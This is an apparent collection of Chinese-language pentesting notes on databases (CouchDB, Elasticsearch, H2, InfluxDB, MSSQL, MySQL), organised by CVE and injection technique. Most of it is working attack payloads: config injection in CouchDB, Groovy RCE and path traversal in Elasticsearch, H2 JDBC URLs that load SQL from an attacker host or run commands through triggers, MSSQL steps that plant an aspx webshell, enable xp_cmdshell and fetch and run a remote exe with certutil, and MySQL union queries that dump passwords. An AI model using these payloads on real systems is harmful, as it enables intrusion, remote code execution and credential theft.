250 | Msg = <<“Config section blacklisted for modification over HTTP API.”>>,
251 | throw({forbidden, Msg});
252 | _ ->
253 | ok
254 | end.
255 | ```
256 | 发现者换了一种写配置文件的方法，将如下内容写到了local.ini中。此时的`os_daemons`在请求体中而不是url中，绕过config对于API的过滤。
257 | ```
258 | curl -X PUT http://localhost:5984/_node/couchdb@localhost/_config/cors/origins -d "\"http://testdomain.com\n\n[os_daemons]\nhackdaemon=ping h2eidk.dnslog.cn\"" -H "Content-Type: application/json"
259 | ```
260 | 也可以从os_daemons官方文档中找到其他路径来完成访问
261 | ```
262 | curl -iv -X PUT http://localhost:5984/_node/couchdb@localhost/_config/update_notification/index-updater -d "\"ping h2eidk.dnslog.cn\"" -H "Content-Type: application/json"
263 | ```
264 | 
265 | ### CVE-2021-38295
266 | 参考链接： https://www.secureideas.com/blog/digging-between-the-couch-cushions  
267 | 
268 | ### CVE-2022-24706
269 | https://www.exploit-db.com/exploits/50914  
270 | 
271 | 
272 | 


--------------------------------------------------------------------------------
/Database/ElasticSearch.md:
--------------------------------------------------------------------------------
  1 | # ElasticSearch
  2 | 
  3 | Elasticsearch是一个开源的搜索引擎，建立在一个全文搜索引擎库Apache Lucene基础之上。Apache Solr也是建立在Lucene上的搜索引擎。Elasticsearch提供了一套RESTful API，所以只支持JSON格式，而Solr则支持多种格式但在实时搜索性能上优于Solr。Elasticsearch是面向文档的存储的，并且使用JSON作为文档的序列化格式。
  4 | 
  5 | 一个运行中的Elasticsearch实例称为一个节点，而集群是由一个或者多个拥有相同cluster.name配置的节点组成。Elasticsearch使用一种称为倒排索引的结构，它适用于快速的全文搜索。一个倒排索引由文档中所有不重复词的列表构成。
  6 | 
  7 | 软件安装包下载： https://www.elastic.co/downloads/past-releases
  8 | 
  9 | 源码下载： https://github.com/elastic/elasticsearch/tags
 10 | 
 11 | 低版本远程调试： `elasticsearch -D "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5556"`
 12 | 
 13 | windows下安装：解压下载后的zip文件，进入bin目录，双击elasticsearch.bat。脚本之行完成会显示`started`，浏览器打开`http://localhost:9200`访问到如下格式的信息即安装成功
 14 | ```
 15 | {
 16 |   "status" : 200,
 17 |   "name" : "Jekyll",
 18 |   "cluster_name" : "elasticsearch",
 19 |   "version" : {
 20 |     "number" : "1.4.2",
 21 |     "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
 22 |     "build_timestamp" : "2014-12-16T14:11:12Z",
 23 |     "build_snapshot" : false,
 24 |     "lucene_version" : "4.10.2"
 25 |   },
 26 |   "tagline" : "You Know, for Search"
 27 | }
 28 | ```
 29 | 除了通过web接口，还可以通过curl来交互(其中，VERB代表HTTP方法，包含GET、 POST、 PUT、 HEAD或者DELETE)
 30 | ```
 31 | curl -X<VERB> '<PROTOCOL>://<HOST>:<PORT>/<PATH>?<QUERY_STRING>' -d '<BODY>'
 32 | ```
 33 | 
 34 | 基本概念：
 35 | ```
 36 | 文档： 数据的存储形式
 37 | 索引（动词）： 存储文档到Elasticsearch的行为，类似INSERT。
 38 | 索引（名词）： 类似传统关系型数据库中的一个数据库。index的复数为indices 或 indexes
 39 | ```
 40 | 
 41 | 基本语句
 42 | ```
 43 | # /索引/文档类型/ID 录入信息， 在请求的查询串参数中加上pretty参数，使JSON响应体更加可读。
 44 | curl -X PUT "localhost:9200/megacorp/employee/1?pretty" -H 'Content-Type: application/json' -d "{\"first_name\":\"John\",\"last_name\":\"Smith\",\"age\":25,\"about\":\"I love to go rock climbing\",\"interests\":[ \"sports\", \"music\"]}"
 45 | 
 46 | # 查询某个ID的数据
 47 | curl -X GET "localhost:9200/megacorp/employee/1"
 48 | 
 49 | # 查询所有数据
 50 | curl -X GET "localhost:9200/megacorp/employee/_search"
 51 | 
 52 | # query-string搜索
 53 | curl -X GET "localhost:9200/megacorp/employee/_search?q=last_name:Smith"
 54 | 
 55 | # 替代query-string的查询表达式，适用于复杂搜索、全文搜索等。如果要对关键词更精准，可以将match替换为match_phrase，即短语搜索
 56 | GET /megacorp/employee/_search
 57 | {
 58 |     "query" : {
 59 |         "match" : {
 60 |             "last_name" : "Smith"
 61 |         }
 62 |     }
 63 | }
 64 | 
 65 | # 聚合分析aggregations，类似group by，可以和match等组合使用
 66 | GET /megacorp/employee/_search
 67 | {
 68 |   "aggs": {
 69 |     "all_interests": {
 70 |       "terms": { "field": "interests" }
 71 |     }
 72 |   }
 73 | }
 74 | 
 75 | # 查询文档中的部分字段
 76 | GET /website/blog/123?_source=title,text
 77 | 
 78 | # 创建新文档，而不覆盖旧的（不确定已有id的情况），只有在_index、_type和_id都不存在时才创建，否则409
 79 | PUT /website/blog/123?op_type=create
 80 | PUT /website/blog/123/_create
 81 | 
 82 | # 文档的部分更新
 83 | POST /website/blog/1/_update
 84 | {
 85 |    "doc" : {
 86 |       "tags" : [ "testing" ],
 87 |       "views": 0
 88 |    }
 89 | }
 90 | 
 91 | # 使用脚本（默认为groovy）更新文档，有些版本已禁用脚本，在config/elasticsearch.yml定义script.groovy.sandbox.enabled: false
 92 | POST /website/blog/1/_update
 93 | {
 94 |    "script" : "ctx._source.views+=1"
 95 | }
 96 | 
 97 | # 分页搜索，类似LIMIT
 98 | GET /_search?size=5&from=10
 99 | ```
100 | 
101 | 一些接口
102 | ```
103 | _cluster/health #集群状态
104 | _search #查询所有文档
105 | /索引/类型/_search #具体某个索引类型下搜索所有文档
106 | 
107 | ```
108 | 
109 | 历史漏洞：
110 | |漏洞编号|漏洞类型|影响版本|
111 | |:----:|:----:|:----:|
112 | |CVE-2014-3120|RCE|< 1.2|
113 | |CVE-2015-1427|RCE|< 1.3.8, 1.4.3|
114 | |CVE-2015-3337|目录穿越|< 1.4.5, 1.5.2|
115 | |CVE-2015-5531|目录穿越|< 1.6.1|
116 | |WooYun-2015-110216|目录穿越|< 1.5.1|
117 | 
118 | 
119 | ## CVE-2015-1427
120 | Ref： https://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
121 | 
122 | POC
123 | ```
124 | POST /_search?pretty
125 | 
126 | {"size":1, "script_fields": {"xxx":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()"}}}
127 | ```
128 | 这个漏洞的重点在于绕过沙箱。1.3之前的版本可以随意写入Java语句。后来在执行表达式查询时，增加了`GroovySandboxExpressionChecker.isAuthorized()`。
129 | ```
130 | public boolean isAuthorized(Expression expression) {
131 |     if (expression instanceof MethodCallExpression) {
132 |         MethodCallExpression mce = (MethodCallExpression) expression;
133 |         String methodName = mce.getMethodAsString(); // poc中得到的methodName为getText
134 |         if (methodBlacklist.contains(methodName)) { // 黑名单包括"getClass"、"wait"、"notify"、"notifyAll"、"finalize"方法
135 |             return false;
136 |         } else if (methodName == null && mce.getMethod() instanceof GStringExpression) {
137 |             // We do not allow GStrings for method invocation, they are a security risk
138 |             return false;
139 |         }
140 |     } else if (expression instanceof ConstructorCallExpression) {
141 |         ConstructorCallExpression cce = (ConstructorCallExpression) expression;
142 |         ClassNode type = cce.getType();
143 |         if (!packageWhitelist.contains(type.getPackageName())) {
144 |             return false;
145 |         }
146 |         if (!classWhitelist.contains(type.getName())) {
147 |             return false;
148 |         }
149 |     }
150 |     return true;
151 | }
152 | ```
153 | 并且能调用的包设定了白名单
154 | ```
155 | java.lang.Math.class.getName(),
156 | java.lang.Integer.class.getName(), "[I", "[[I", "[[[I",
157 | ...
158 | java.util.Date.class.getName(),
159 | java.util.List.class.getName(),
160 | java.util.Map.class.getName(),
161 | java.util.Set.class.getName(),
162 | java.lang.Object.class.getName(),
163 | ```
164 | 
165 | ## CVE-2015-3337
166 | 漏洞需要安装"Site plugins"，较为流行的"Site plugins"包括Head、Kopf等。安装Head插件，在bin文件夹下运行如下命令（限于5.0版本之前）
167 | ```
168 | plugin -install mobz/elasticsearch-head
169 | ```
170 | 访问`http://localhost:9200/_plugin/head/`，查看是否安装成功（无需重启）
171 | 
172 | POC（不能在浏览器访问）
173 | ```
174 | http://localhost:9200/_plugin/head/../../../../../../../../../etc/passwd
175 | http://localhost:9200/_plugin/head/../../../../../../../../Windows/win.ini/
176 | ```
177 | 修复： https://github.com/elastic/elasticsearch/pull/10815/files
178 | 漏洞修复时在`HttpServer.handlePluginSite()`中增加了一条判断`!file.toAbsolutePath().normalize().startsWith(siteFile.toAbsolutePath())`，过滤目录穿越
179 | 
180 | ## CVE-2015-5531
181 | 官方描述此漏洞是`read arbitrary files via unspecified vectors related to snapshot API calls`，查看snapshot的官方文档，所谓快照是一种备份的功能，想要制作快照需要先注册存储库（每个存储库都是独立的，数据不共享），然后在存储库中创建快照。官方给出的这两步的API使用demo如下
182 | ```
183 | PUT /_snapshot/my_repository
184 | {
185 |   "type": "fs",
186 |   "settings": {
187 |     "location": "my_backup_location"
188 |   }
189 | }
190 | 
191 | PUT /_snapshot/my_repository/my_snapshot 
192 | ```
193 | 只需要将location后面随意写个存储位置，然后访问如下网址
194 | ```
195 | GET /_snapshot/my_repository/my_snapshot%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fWindows%2fwin.ini/
196 | ```
197 | 得到如下响应内容
198 | ```
199 | HTTP/1.1 400 Bad Request
200 | Content-Type: application/json; charset=UTF-8
201 | Content-Length: 524
202 | 
203 | {"error":"ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=92): [59, 32, 102, 111, 114, 32, 49, 54, 45, 98, 105, 116, 32, 97, 112, 112, 32, 115, 117, 112, 112, 111, 114, 116, 13, 10, 91, 102, 111, 110, 116, 115, 93, 13, 10, 91, 101, 120, 116, 101, 110, 115, 105, 111, 110, 115, 93, 13, 10, 91, 109, 99, 105, 32, 101, 120, 116, 101, 110, 115, 105, 111, 110, 115, 93, 13, 10, 91, 102, 105, 108, 101, 115, 93, 13, 10, 91, 77, 97, 105, 108, 93, 13, 10, 77, 65, 80, 73, 61, 49, 13, 10]]","status":400}
204 | ```
205 | 将error中的ascii码进行解码，例如可以在chrome的console中利用`String.fromCharCode(ascii)`来解码，得到真实内容
206 | 
207 | ## WooYun-2015-110216
208 | Ref： http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2015-0110216
209 | 


--------------------------------------------------------------------------------
/Database/H2 Database.md:
--------------------------------------------------------------------------------
  1 | # H2 Database
  2 | 
  3 | H2是一个用Java开发的嵌入式数据库。H2的运行模式包括：内嵌模式（本地连接，使用JDBC）、服务器模式(远程连接，从其他进程或其他机器访问，在TCP层使用JDBC或ODBC)、混合模式（设置AUTO_SERVER=TRUE，同时支持本地或远程）。各运行模式的Url如下
  4 | ```
  5 | 
  6 | 本地连接——本地文件连接
  7 | jdbc:h2:~/test
  8 | jdbc:h2:file:/data/sample
  9 | jdbc:h2:file:C:/data/sample(windows)
 10 | 
 11 | 本地连接——内存数据库
 12 | jdbc:h2:mem:（私有格式，只有一个到内存数据库的连接）
 13 | jdbc:h2:mem:<databaseName>（这样到内存数据库有多个连接，但是默认最后一个连接关闭时会关闭内存数据库，如果要保持数据库连接添加DB_CLOSE_DELAY=-1）
 14 | 
 15 | 服务器模式
 16 | jdbc:h2:tcp://<server>[:<port>]/[<path>]<databaseName>
 17 | jdbc:h2:ssl://<server>[:<port>]/<databaseName>
 18 | jdbc:h2:tcp://localhost/~/test
 19 | jdbc:h2:tcp://localhost/mem:test 
 20 | jdbc:h2:ssl://localhost:8085/~/sample;
 21 | ```
 22 | 
 23 | 数据库连接时可以进行一些设置，例如连接时执行sql
 24 | ```
 25 | jdbc:h2:<url>;INIT=RUNSCRIPT FROM '~/create.sql'  // 执行一个sql文件
 26 | jdbc:h2:file:~/sample;INIT=RUNSCRIPT FROM '~/create.sql'\;RUNSCRIPT FROM '~/populate.sql'  // 执行多个sql文件
 27 | ```
 28 | 
 29 | 官方网站：http://www.h2database.com/html/main.html
 30 | 
 31 | 历史安装版本下载地址：http://www.h2database.com/html/download-archive.html
 32 | 
 33 | 重点历史漏洞：
 34 | | 漏洞编号 | 漏洞类型 | 影响版本 |
 35 | |:---:|:---:|:---:|
 36 | |CVE-2021-23463|SQL|< 2.0.202 |
 37 | |CVE-2021-42392|RCE|<= 2.0.204|
 38 | |CVE-2022-23221|RCE|< 2.1.210|
 39 | 
 40 | ## CVE-2022-23221
 41 | 参考链接： https://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html
 42 | 对于数据库URL的官方说明： http://www.h2database.com/html/features.html
 43 | 
 44 | 这个漏洞用到的payload
 45 | ```
 46 | jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT
 47 | FROM 'http://attacker/evil.sql';'\
 48 | ```
 49 | `INIT`参数是H2数据库的JDBC URL支持的一个配置，即在连接数据库时支持执行一条初始化命令，但命令中不能包含分号。这个Payload又借助了另一个命令`RUNSCRIPT`，该命令用于执行SQL文件，例如`RUNSCRIPT FROM './evil.sql'`，对应的处理类是`h2/src/main/org/h2/store/fs/FilePathDisk.java`
 50 | ```
 51 |     public InputStream newInputStream() throws IOException {
 52 |         if (name.matches("[a-zA-Z]{2,19}:.*")) {
 53 |             if (name.startsWith(CLASSPATH_PREFIX)) { // classpath: ...}
 54 |             URL url = new URL(name);
 55 |             return url.openStream();
 56 |         }
 57 |         FileInputStream in = new FileInputStream(name);
 58 |         IOUtils.trace("openFileInputStream", name, in);
 59 |         return in;
 60 |     }
 61 | ```
 62 | 而这个类再读取数据时，也可以读取url地址。所以就可以将命令执行的sql写到文件中。进而造成RCE。参考链接中给出的sql内容如下，也可以参照文章下方的命令执行部分的sql，实现JDBC注入造成命令执行
 63 | ```
 64 | CREATE TABLE test (
 65 |      id INT NOT NULL
 66 |  );
 67 | 
 68 | CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
 69 | var fos = Java.type("java.io.FileOutputStream");
 70 | var b = new fos ("/tmp/pwnedlolol");';
 71 | 
 72 | INSERT INTO TEST VALUES (1);
 73 | ```
 74 | 
 75 | ## CVE-2021-42392
 76 | 参考链接： https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
 77 | 
 78 | ## Spring+H2 未授权访问
 79 | SpringBoot配置H2一般如下，这样会为web应用增加一个路径`/h2-console/`，这个默认路径可以通过`spring.h2.console.path`来修改。
 80 | ```
 81 | spring.h2.console.enabled=true
 82 | spring.h2.console.settings.web-allow-others=true
 83 | ```
 84 | 而spring.h2.console.settings.web-allow-others设置为true，就会允许任意用户访问console。造成未授权访问。然后可以与上述JNDI攻击配合。
 85 | 
 86 | ## 命令执行
 87 | https://www.h2database.com/html/commands.html
 88 | 
 89 | 根据上述官方官方文档，H2支持的命令中`CREATE ALIAS`和`CREATE TRIGGER`可以让用户自定义函数（UDF），P牛给出一个自定义shell函数的写法，其中两个`$`符号表示无需转义的长字符串。
 90 | ```
 91 | CREATE ALIAS shell AS $$void shell(String s) throws Exception { java.lang.Runtime.getRuntime().exec(s);
 92 | }$$;
 93 | SELECT shell('cmd /c calc.exe');
 94 | ```
 95 | 这个利用的前提是（1）h2 console支持“创建”数据库，如果默认不支持则需要在启动console时添加`-ifNotExists`参数（2）目标系统配置了javac （3）创建UDF并执行
 96 | 
 97 | 
 98 | ## 不出网命令执行
 99 | 后来P牛也提到，如果实战中，遇到不出网的情况，上面CVE-2022-23221从url中加载sql文件就无法生效。init只能执行一条sql。也就是只能定义UDF不能执行UDF。就需要在定义的时候就让代码执行。然后提出了利用Groovy元编程的技巧，在编译Groovy语句(而非执行时)就执行攻击者预期的代码。
100 | ```
101 | jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS shell2 AS $$@groovy.transform.ASTTest(value={
102 | assert java.lang.Runtime.getRuntime().exec("cmd.exe /c calc.exe") })
103 | def x$$
104 | ```
105 | 但是这个不出网利用要用到本地的groovy依赖，并且这个groovy依赖不是常见的groovy库，而是groovy-sql，依赖如下
106 | ```
107 | <dependency>
108 |   <groupId>org.codehaus.groovy</groupId>
109 |   <artifactId>groovy-sql</artifactId>
110 |   <version>3.0.8</version>
111 | </dependency>
112 | ```
113 | 
114 | 这个限制就很难了。所以P牛又提到了`CREATE TRIGGER`。官方文档表明，可以使用`javax.script.ScriptEngineManager`创建org.h2.api.Trigger的实例。来解析javascript或ruby脚本。由于`javax.script.ScriptEngineManager`是jdk自带的，避免了需要`groovy-sql`这种第三方依赖的问题。
115 | 
116 | 而Trigger在编译对象时，只通过前缀来判断脚本。`org.h2.schema.TriggerObject@loadFromSource`代码如下
117 | ```java
118 | if (SourceCompiler.isJavaxScriptSource(triggerSource)) {
119 |     return (Trigger) compiler.getCompiledScript(fullClassName).eval();
120 | }
121 | 
122 | public static boolean isJavaxScriptSource(String source) {
123 |     return isJavascriptSource(source) || isRubySource(source);
124 | }
125 | 
126 | private static boolean isJavascriptSource(String source) { 
127 |     return source.startsWith("//javascript"); // 
128 | }
129 | 
130 | private static boolean isRubySource(String source) { 
131 |     return source.startsWith("#ruby");
132 | }
133 | ```
134 | 代码表明只要以`//javascript`开头就认为是javascript脚本，构造的payload如下。`//javascript`后面需要有个换行！这个jdbc url相对上面的payload来讲，没有什么限制。只要在paylaod可控的背景下就可以攻击。
135 | ```
136 | jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
137 |     java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')
138 | $$
139 | ```
140 | 
141 | 很多攻击是基于H2 database console界面的，利用方式存在一些限制。但是如果能直接控制JDBC URL的场景，就没有如下的限制。
142 | ```
143 | 开启 -webAllowOthers 选项，支持外网访问
144 | 开启 -ifNotExists 选项，支持创建数据库
145 | ```
146 | 


--------------------------------------------------------------------------------
/Database/InfluxDB.md:
--------------------------------------------------------------------------------
 1 | # InfluxDB
 2 | InfluxDB是一个由InfluxData开发的开源时序型数据库 (Time Series Database，TSDB) ，由Go编写，用于处理和存储时序数据（随时间不断产生的一系列带时间戳的数据）被广泛应用于存储系统的监控数据，IoT行业的实时数据等场景。
 3 | 
 4 | 历史版本源码下载： https://github.com/influxdata/influxdb/tags
 5 | 
 6 | Windows安装包下载（将后缀换成所需版本）： https://dl.influxdata.com/influxdb/releases/influxdb-1.7.4_windows_amd64.zip
 7 | 
 8 | Windows安装教程，按顺序执行如下三步（其中config后的路径改为自己influxdb的目录位置） 
 9 | ```
10 | influxd.exe config C:\influxdb-1.7.4\influxdb.conf
11 | influxd.exe
12 | influx.exe
13 | ```
14 | influx正确启动后，可以看到如下显示，并可以在命令行中进行交互
15 | ```
16 | Connected to http://localhost:8086 version 1.7.4
17 | ```
18 | 
19 | 官方使用教程： https://docs.influxdata.com/influxdb/v2.4/get-started/
20 | 
21 | 
22 | 历史漏洞
23 | 
24 | |漏洞编号|漏洞类型|影响版本|
25 | |:----:|:----:|:----:|
26 | |CVE-2019-20933|身份验证绕过|< 1.7.6|
27 | |CVE-2022-36640|RCE|< 1.8.10|
28 | 
29 | 
30 | ## CVE-2019-20933
31 | Ref： https://www.komodosec.com/post/when-all-else-fails-find-a-0-day
32 | 


--------------------------------------------------------------------------------
/Database/mssql.md:
--------------------------------------------------------------------------------
  1 | ## mssql 注入
  2 | 
  3 | 查询数据库名称
  4 | ```
  5 | select name from master.dbo.sysdatabases;
  6 | ```
  7 | `master、model、msdb、tempdb`是mssql的默认数据库
  8 | 
  9 | 查询用户权限
 10 | ```
 11 | select IS_MEMBER('db_owner');
 12 | ```
 13 | 服务器角色包含：`sysadmin、serveradmin、securityadmin、processadmin、setupadmin、bulkadmin、diskadmin、dbcreator、public`
 14 | 数据库角色包含：`db_owner、db_securityadmin、db_accessadmin、db_backupoperator、db_ddladmin、db_datawriter、db_datareader、db_denydatewriter、db_denydatareader`
 15 | 
 16 | 查询数据库版本
 17 | ```
 18 | select @@version;
 19 | ```
 20 | 
 21 | 查询当前数据库名
 22 | ```
 23 | select db_name();
 24 | ```
 25 | 
 26 | 查询服务器名称
 27 | ```
 28 | select HOST_NAME();
 29 | select @@SERVERNAME;
 30 | ```
 31 | 
 32 | 爆当前数据库
 33 | ```
 34 | select * from xxx where id=1 and db_name()>0;
 35 | select * from xxx where id=1 and db_name()>'e';
 36 | ```
 37 | 
 38 | 查询数据库下的所有表
 39 | ```
 40 | select * from INFORMATION_SCHEMA.TABLES;
 41 | ```
 42 | 
 43 | 爆表名，xx代表表名。`1=`可能出现数据类型转换错误，形成报错注入。或用对应类型的`'e'<`来判断名称
 44 | ```
 45 | select * from xxx where id=1 and 1=(select top 1 name from sysobjects where xtype='u' and name='xx');
 46 | select * from xxx where id=1 and 'e'<(select top 1 name from sysobjects where xtype='u' and name='xx');
 47 | 
 48 | select * from xxx where id=1 and 'e'<(select top 1 TABLE_NAME from INFORMATION_SCHEMA.TABLES);
 49 | ```
 50 | 
 51 | 爆列名
 52 | ```
 53 | select * from xxx where id=1 and 'b'>(select top 1 name from syscolumns where id=(select id from sysobjects where name='xx') and name<>'id');
 54 | ```
 55 | 
 56 | 爆数据
 57 | ```
 58 | select * from xxx where id=1 and 1=(select top 1 password from xx);
 59 | select * from xxx where id=1 and 'C'<(select top 1 password from xx);
 60 | ```
 61 | 
 62 | 报错注入
 63 | ```
 64 | select * from xxx where id=1 (select CAST(USER as int));
 65 | select * from xxx where id=1 (select convert(int,USER));
 66 | select * from xxx where id=1 select 1 union (select CAST(USER as int))
 67 | // 用declare定义变量并执行，还可对变量进行HEX和ASCII编码
 68 | select * from xxx where id=1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a);
 69 | // ASCII编码
 70 | select * from HrmResourceManager where id=1;declare @a nvarchar(2000) set @a=CHAR(115) + CHAR(101) + CHAR(108) + CHAR(101) + CHAR(99) + CHAR(116) + CHAR(32) + CHAR(99) + CHAR(111) + CHAR(110) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(116) + CHAR(40) + CHAR(105) + CHAR(110) + CHAR(116) + CHAR(44) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110) + CHAR(41) exec(@a);
 71 | ```
 72 | 
 73 | 盲注
 74 | ```
 75 | // 布尔盲注
 76 | select * from xxx where id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1))>=109;
 77 | // 时间盲注
 78 | select * from xxx where id=1;if(ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY '0:0:5';
 79 | ```
 80 | 
 81 | 联合注入
 82 | ```
 83 | // null的数量需要与xxx表的列数相同
 84 | select * from xxx where id=1 union select null,null,null;
 85 | ```
 86 | 
 87 | 列目录
 88 | ```
 89 | execute master..xp_dirtree 'c:' // 列出C盘下的所有文件和目录
 90 | execute master..xp_dirtree 'c:',1  // 只列出C文件夹
 91 | ```
 92 | 
 93 | 写shell
 94 | ```
 95 | // 创建文件夹表
 96 | select * from xxx where id=1;CREATE TABLE testtemp (dir varchar(8000),num int,num1 int);
 97 | // 将C盘的文件夹名称写入数据表
 98 | select * from xxx where id=1;insert into testtemp(dir,num,num1) execute master..xp_dirtree 'C:',1,1;
 99 | // 创建cmd执行表
100 | select * from xxx where id=1;CREATE TABLE cmdtemp (dir varchar(8000));
101 | // 将cmd搜索结果写入表
102 | select * from xxx where id=1;insert into cmdtemp(dir) exec master..xp_cmdshell 'for /r c:\ %i in (lululu.jsp) do @echo %i';
103 | // 指定目录写文件
104 | select * from xxx where id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\lululu.aspx' ;
105 | ```
106 | 
107 | xp_cmdshell不存在的解决方法
108 | ```
109 | // 如果master..xp_cmdshell未开启,用如下命令开启
110 | EXEC sp_configure 'show advanced options', 1;  //允许更改参数
111 | RECONFIGURE;
112 | EXEC sp_configure 'xp_cmdshell', 1;  //开启xp_cmdshell
113 | RECONFIGURE;
114 | 
115 | // 如果master..xp_cmdshell被删除，恢复sp_oacreate
116 | EXEC sp_configure 'show advanced options', 1;  //允许更改参数
117 | RECONFIGURE WITH OVERRIDE;
118 | EXEC sp_configure 'Ole Automation Procedures',1;
119 | RECONFIGURE WITH OVERRIDE;
120 | EXEC sp_configure 'show advanced options',0;
121 | RECONFIGURE WITH OVERRIDE;
122 | ```
123 | 
124 | sp_oacreate执行命令
125 | ```
126 | declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c calc.exe'
127 | 
128 | declare @o int
129 | exec sp_oacreate 'Shell.Application', @o out
130 | exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','','1';
131 | ```
132 | 
133 | 差异备份
134 | ```
135 | //这一步很可能出现拒绝访问错误，说明没有文件夹操作权限。只有给予该文件夹读写权限才能执行
136 | backup database xxxx to disk='c:\Users\xxxxx'
137 | backup database xxxx to disk='c:\Users\xxxxx' WITH DIFFERENTIAL,FORMAT;--
138 | 
139 | // 日志备份
140 | alter database ecology set RECOVERY FULL; //先将数据库恢复模式设为完整模式
141 | backup log ecology to disk='C:\Users\xxx\log.bak' with init
142 | ```
143 | 
144 | 站库分离(网站和数据库分别在不同的内网服务器上)场景下getshell
145 | ```
146 | exec master.dbo.xp_cmdshell 'cd c:\Users\xxxxx & certutil -urlcache -split -f http://ip:port/file.exe'; //从远程下载恶意文件并运行，除certutil外还可用vbs、bitsadmin、powershell、ftp
147 | exec master.dbo.xp_cmdshell 'cd c:\Users\xxxxx & file.exe';
148 | ```
149 | 
150 | 其他的一些进阶操作，参考：https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI/blob/master/2.2.MSSQL%E6%8F%90%E6%9D%83%E4%B8%8E%E7%AB%99%E5%BA%93%E5%88%86%E7%A6%BB.md
151 | 
152 | 特殊符号
153 | ```
154 | 注释: /* */  --
155 | 空白符号: /**/
156 | 加号: %2b （查询多条数据）
157 | ```
158 | 
159 | 一些绕过
160 | ```
161 | // 表名转换为[表名]
162 | select top 1 name from sysobjects -> select top 1 name from[sysobjects] 
163 | 
164 | // 注释
165 | union select -> union/*select*/
166 | union select -> union/*!1*/select--*/
167 | 
168 | // 注释+换行(%0a) , %20空格
169 | select * from xxx where id=1--/*%0aif (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--%20*/
170 | select * from xxx where id=1--/*%0aexec xp_create_subdir 'c:\text'--%20*/
171 | ```
172 | 
173 | mssql对象类型
174 | ```
175 | AF = 聚合函数 (CLR)
176 | C = CHECK 约束
177 | D = 默认或默认约束
178 | F = FOREIGN KEY 约束
179 | L = 对数
180 | FN = 标量函数
181 | FS = 装配 (CLR) 标量函数
182 | FT = 装配(CLR) 表值函数
183 | IF = 内联表函数
184 | IT = 内部表
185 | P = 存储过程
186 | PC = 程序集 (CLR) 存储过程
187 | PK = 主键约束（类型为 K）
188 | RF = 复制过滤器存储过程
189 | S = 系统表
190 | SN = 同义词
191 | SO = 序列
192 | SQ = 服务队列
193 | TA = 装配 (CLR) DML 触发器
194 | TF = 表函数
195 | TR = SQL DML 触发器
196 | TT = 表类型
197 | U = 用户表
198 | UQ = UNIQUE 约束（类型为 K）
199 | V = 视图
200 | X = 扩展存储过程
201 | ```
202 | 
203 | 


--------------------------------------------------------------------------------
/Database/mysql.md:
--------------------------------------------------------------------------------
  1 | ## MySQL注入
  2 | 
  3 | ### 查询
  4 | ```
  5 | # 查询数据库
  6 | show databases;
  7 | 
  8 | # 查询数据表
  9 | use test;
 10 | show tables;
 11 | 
 12 | # 查询数据库
 13 | select schema_name from information_schema.schemata;
 14 | 
 15 | # 查询数据表
 16 | select table_name from information_schema.tables where table_schema=0x74657374; // "test" 或 "test"的十六进制表示
 17 | 
 18 | # 判断列数
 19 | order by 1 根据第x列进行排序，如果x超过列数则报错
 20 | 
 21 | # 查询列
 22 | select column_name from information_schema.columns where table_name=0x7573657273;  // "users" 或 "users"的十六进制表示
 23 | 
 24 | # 具体查询某数据库、某表的列
 25 | select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=0x74657374;
 26 | 
 27 | # 数据库版本查询
 28 | select @@version;
 29 | select version();
 30 | select /*!40000 version()*/
 31 | 
 32 | # 其他信息查询
 33 | select @@datadir;  // 查询数据库所在路径
 34 | select @@version_compile_os;  //查询操作系统
 35 | select system_user() //系统用户名 
 36 | select user() //用户名 
 37 | select current_user() //当前用户名 
 38 | select session_user() //连接数据库的用户名
 39 | select 1,host,user from mysql.user; //查询host与user
 40 | ```
 41 | `information_schema`是用于存储数据库元数据的表，它保存了数据库名，表名，列名等信息。`SCHEMATA`表保存所有数据库信息；`TABLES`表保存数据库中的表信息。`COLUMNS`表保存了表的列信息
 42 | `/*!`后面跟的是版本，表示在X版本之上执行。上面表示的是在mysql4以上版本执行
 43 | 
 44 | ### 注入类型
 45 | ```
 46 | select * from users where id = 1;
 47 | select * from users where id = '1';
 48 | select * from users where id = "1";
 49 | select * from users where id = (1);
 50 | select * from users where id = ('1');
 51 | select * from users where id = ("1");
 52 | select * from users where username like '%adm%';
 53 | select * from users where username like ('%adm%');
 54 | ```
 55 | 
 56 | ### 联合注入
 57 | ```
 58 | id=-2' union select 1,schema_name,3 from information_schema.schemata limit 2,1 -- +
 59 | id=-2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- +
 60 | id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 -- +
 61 | id=-2' union select 1,group_concat(username,0x7C,password),3 from users-- +
 62 | ```
